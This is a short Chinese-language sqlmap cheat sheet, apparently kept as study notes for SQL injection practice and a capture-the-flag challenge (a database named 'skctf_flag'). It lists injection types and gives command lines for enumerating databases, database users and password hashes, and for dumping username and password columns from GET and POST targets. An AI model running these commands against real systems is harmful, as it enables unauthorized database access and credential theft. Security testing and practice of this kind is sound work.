sqlmap使用:
注入类型有四种分别为:
boolean-based blind
error-based
stacked queries
inline query
cmd操作:
python E:\Python27\sqlmap\sqlmapproject-sqlmap-6d48df2\sqlmap.py
后,加下面的操作
#-u 注入点 检测注入点是否可用
#曝出该sqlserver中所有数据库名称
-u 'http://192.168.87.19/index.php?r=default/news/content&id=12' --dbs
#web当前使用的数据库
-u 'http://192.168.87.19/index.php?r=default/news/content&id=12' --current-db
#web数据库使用账户
-u 'http://192.168.87.19/index.php?r=default/news/content&id=12' --current-user
#列出sql所有用户
-u 'http://192.168.87.19/index.php?r=default/news/content&id=12' --users
#数据库用户密码
-u 'http://192.168.87.19/index.php?r=default/news/content&id=12' --passwords
#输出所有的表
-u 'http://192.168.87.19/index.php?r=default/news/content&id=12' --tables
#-D 指定数据库名
-u 'http://192.168.87.19/index.php?r=default/news/content&id=12' -D 【数据库名】 --tables
#-T:指定要列出字段的表 --columns 列出了所有的列字段
-u 'http://192.168.87.19/index.php?r=default/news/content&id=12' -D 【数据库名】 -T 【表名】 --columns
# -C :指定要暴的字段 --dump:将结果导出
qlmap -u 'http://192.168.87.19/index.php?r=default/news/content&id=12' -D 【数据库名】 -T 【表名】 -C "username,realname,password" --dump
以上为GET传参-u ‘http://192.168.87.19/index.php?r=default/news/content&id=12’,以下为POST传参-u “http://123.206.87.240:8002/chengjidan/index.php” “id=1”,注意参数id的方式不同,其他操作一样
python E:\Python27\sqlmap\sqlmapproject-sqlmap-6d48df2\sqlmap.py -u "http://123.206.87.240:8002/chengjidan/index.php" --data "id=1" -D skctf_flag -T fl4g -C "skctf_flag" --dump
配合sqlmap导出的网址txt进行注册
python E:\Python27\sqlmap\sqlmapproject-sqlmap-6d48df2\sqlmap.py -r"D:\test.txt" admin_name --dbs